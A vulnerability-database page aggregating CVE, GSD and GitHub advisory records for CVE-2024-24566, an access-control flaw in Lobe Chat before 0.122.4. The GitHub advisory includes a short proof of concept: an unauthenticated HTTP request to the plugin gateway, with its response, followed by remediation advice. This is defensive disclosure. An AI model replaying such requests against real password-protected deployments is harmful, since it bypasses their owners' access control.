cve-2024-24566
Vulnerability from cvelistv5
Published
2024-01-31 16:33
Modified
2025-06-17 21:29
Severity ?
EPSS score ?
Summary
Lobe Chat unauthorized access to plugins
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:19:52.946Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
},
{
"name": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-24566",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-31T19:29:39.876777Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-17T21:29:21.984Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "lobe-chat",
"vendor": "lobehub",
"versions": [
{
"status": "affected",
"version": "\u003c 0.122.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-284",
"description": "CWE-284: Improper Access Control",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-31T16:33:44.129Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
},
{
"name": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
}
],
"source": {
"advisory": "GHSA-pf55-fj96-xf37",
"discovery": "UNKNOWN"
},
"title": "Lobe Chat unauthorized access to plugins"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-24566",
"datePublished": "2024-01-31T16:33:44.129Z",
"dateReserved": "2024-01-25T15:09:40.210Z",
"dateUpdated": "2025-06-17T21:29:21.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-24566\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-01-31T17:15:39.173\",\"lastModified\":\"2024-02-09T15:25:16.147\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4.\"},{\"lang\":\"es\",\"value\":\"Lobe Chat es un framework de chatbot que admite s\u00edntesis de voz, sistema de complemento de llamada de funci\u00f3n multimodal y extensible. Cuando la aplicaci\u00f3n est\u00e1 protegida con contrase\u00f1a (implementada con la opci\u00f3n `ACCESS_CODE`), es posible acceder a los complementos sin la autorizaci\u00f3n adecuada (sin contrase\u00f1a). Esta vulnerabilidad est\u00e1 parcheada en 0.122.4.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-Other\"}]},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:lobehub:lobe_chat:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.122.4\",\"matchCriteriaId\":\"68753204-5FDE-44B0-970E-5F9E4AD01C5A\"}]}]}],\"references\":[{\"url\":\"https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}"
}
}
gsd-2024-24566
Vulnerability from gsd
Modified
2024-01-26 06:02
Details
Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4.
Aliases
{
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2024-24566"
],
"details": "Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4.",
"id": "GSD-2024-24566",
"modified": "2024-01-26T06:02:26.101546Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2024-24566",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "lobe-chat",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 0.122.4"
}
]
}
}
]
},
"vendor_name": "lobehub"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4."
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-284",
"lang": "eng",
"value": "CWE-284: Improper Access Control"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37",
"refsource": "MISC",
"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
},
{
"name": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd",
"refsource": "MISC",
"url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
}
]
},
"source": {
"advisory": "GHSA-pf55-fj96-xf37",
"discovery": "UNKNOWN"
}
},
"nvd.nist.gov": {
"cve": {
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:lobehub:lobe_chat:*:*:*:*:*:*:*:*",
"matchCriteriaId": "68753204-5FDE-44B0-970E-5F9E4AD01C5A",
"versionEndExcluding": "0.122.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. When the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password). This vulnerability is patched in 0.122.4."
},
{
"lang": "es",
"value": "Lobe Chat es un framework de chatbot que admite s\u00edntesis de voz, sistema de complemento de llamada de funci\u00f3n multimodal y extensible. Cuando la aplicaci\u00f3n est\u00e1 protegida con contrase\u00f1a (implementada con la opci\u00f3n `ACCESS_CODE`), es posible acceder a los complementos sin la autorizaci\u00f3n adecuada (sin contrase\u00f1a). Esta vulnerabilidad est\u00e1 parcheada en 0.122.4."
}
],
"id": "CVE-2024-24566",
"lastModified": "2024-02-09T15:25:16.147",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-01-31T17:15:39.173",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-284"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
}
}
}
ghsa-pf55-fj96-xf37
Vulnerability from github
Published
2024-01-31 18:04
Modified
2024-01-31 20:25
Severity ?
Summary
@lobehub/chat vulnerable to unauthorized access to plugins
Details
Description:
When the application is password-protected (deployed with the ACCESS_CODE option), it is possible to access plugins without proper authorization (without password).
Proof-of-Concept:
Let’s suppose that application has been deployed with following command:
sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat
Due to the utilization of the ACCESS_CODE, access to the chat is possible only after entering the password:
However, it is possible to interact with chat plugins without entering the ACCESS_CODE.
Example HTTP request:
```
POST /api/plugin/gateway HTTP/1.1
Host: localhost:3210
Content-Length: 1276
{"apiName":"checkWeatherUsingGET","arguments":"{\n \"location\": \"London\"\n}","identifier":"WeatherGPT","type":"default","manifest":{"api":[{"description":"Get current weather information","name":"checkWeatherUsingGET","parameters":{"properties":{"location":{"type":"string"}},"required":["location"],"type":"object"}}],"homepage":"https://weathergpt.vercel.app/legal","identifier":"WeatherGPT","meta":{"avatar":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp","description":"Get current weather information for a specific location.","title":"WeatherGPT"},"openapi":"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json","systemRole":"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.","type":"default","version":"1","settings":{"properties":{},"type":"object"}}}
HTTP response:
HTTP/1.1 200 OK
[...]
{"location":{"name":"London","region":"City of London, Greater London","country":"United Kingdom","lat":51.52,"lon":-0.11,"tz_id":"Europe/London","localtime_epoch":1706379026,"localtime":"2024-01-27 18:10"},"current":{"last_updated_epoch":1706378400,"last_updated":"2024-01-27 18:00","temp_c":6,"temp_f":42.8,"is_day":0,"condition":{"text":"Clear","icon":"//cdn.weatherapi.com/weather/64x64/night/113.png","code":1000},"wind_mph":4.3,"wind_kph":6.8,"wind_degree":170,"wind_dir":"S","pressure_mb":1031,"pressure_in":30.45,"precip_mm":0,"precip_in":0,"humidity":81,"cloud":0,"feelslike_c":3.8,"feelslike_f":38.9,"vis_km":10,"vis_miles":6,"uv":1,"gust_mph":9.5,"gust_kph":15.3},"infoLink":"https://weathergpt.vercel.app/London"}
```
Remediation:
Verify the ACCESS_CODE for HTTP requests to the /api/plugin/: route.
Impact:
Unauthorized access to plugins.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.122.3"
},
"package": {
"ecosystem": "npm",
"name": "@lobehub/chat"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.122.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-24566"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-31T18:04:55Z",
"nvd_published_at": "2024-01-31T17:15:39Z",
"severity": "MODERATE"
},
"details": "###\tDescription:\nWhen the application is password-protected (deployed with the `ACCESS_CODE` option), it is possible to access plugins without proper authorization (without password).\n###\tProof-of-Concept:\nLet\u2019s suppose that application has been deployed with following command:\n```sudo docker run -d -p 3210:3210 -e OPENAI_API_KEY=sk-[REDACTED] -e ACCESS_CODE=TEST123 --name lobe-chat lobehub/lobe-chat```\nDue to the utilization of the `ACCESS_CODE`, access to the chat is possible only after entering the password:\n \n\n\n\nHowever, it is possible to interact with chat plugins without entering the `ACCESS_CODE`. \nExample HTTP request:\n```\nPOST /api/plugin/gateway HTTP/1.1\nHost: localhost:3210\nContent-Length: 1276\n\n{\"apiName\":\"checkWeatherUsingGET\",\"arguments\":\"{\\n \\\"location\\\": \\\"London\\\"\\n}\",\"identifier\":\"WeatherGPT\",\"type\":\"default\",\"manifest\":{\"api\":[{\"description\":\"Get current weather information\",\"name\":\"checkWeatherUsingGET\",\"parameters\":{\"properties\":{\"location\":{\"type\":\"string\"}},\"required\":[\"location\"],\"type\":\"object\"}}],\"homepage\":\"https://weathergpt.vercel.app/legal\",\"identifier\":\"WeatherGPT\",\"meta\":{\"avatar\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp\",\"description\":\"Get current weather information for a specific location.\",\"title\":\"WeatherGPT\"},\"openapi\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json\",\"systemRole\":\"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it\u0027s being generated by the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.\",\"type\":\"default\",\"version\":\"1\",\"settings\":{\"properties\":{},\"type\":\"object\"}}}\n```\nHTTP response:\n```\nHTTP/1.1 200 OK\n[...]\n{\"location\":{\"name\":\"London\",\"region\":\"City of London, Greater London\",\"country\":\"United Kingdom\",\"lat\":51.52,\"lon\":-0.11,\"tz_id\":\"Europe/London\",\"localtime_epoch\":1706379026,\"localtime\":\"2024-01-27 18:10\"},\"current\":{\"last_updated_epoch\":1706378400,\"last_updated\":\"2024-01-27 18:00\",\"temp_c\":6,\"temp_f\":42.8,\"is_day\":0,\"condition\":{\"text\":\"Clear\",\"icon\":\"//cdn.weatherapi.com/weather/64x64/night/113.png\",\"code\":1000},\"wind_mph\":4.3,\"wind_kph\":6.8,\"wind_degree\":170,\"wind_dir\":\"S\",\"pressure_mb\":1031,\"pressure_in\":30.45,\"precip_mm\":0,\"precip_in\":0,\"humidity\":81,\"cloud\":0,\"feelslike_c\":3.8,\"feelslike_f\":38.9,\"vis_km\":10,\"vis_miles\":6,\"uv\":1,\"gust_mph\":9.5,\"gust_kph\":15.3},\"infoLink\":\"https://weathergpt.vercel.app/London\"}\n```\n###\tRemediation:\nVerify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route.\n\n###\tImpact:\nUnauthorized access to plugins.",
"id": "GHSA-pf55-fj96-xf37",
"modified": "2024-01-31T20:25:37Z",
"published": "2024-01-31T18:04:55Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24566"
},
{
"type": "WEB",
"url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
},
{
"type": "PACKAGE",
"url": "https://github.com/lobehub/lobe-chat"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "@lobehub/chat vulnerable to unauthorized access to plugins"
}
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.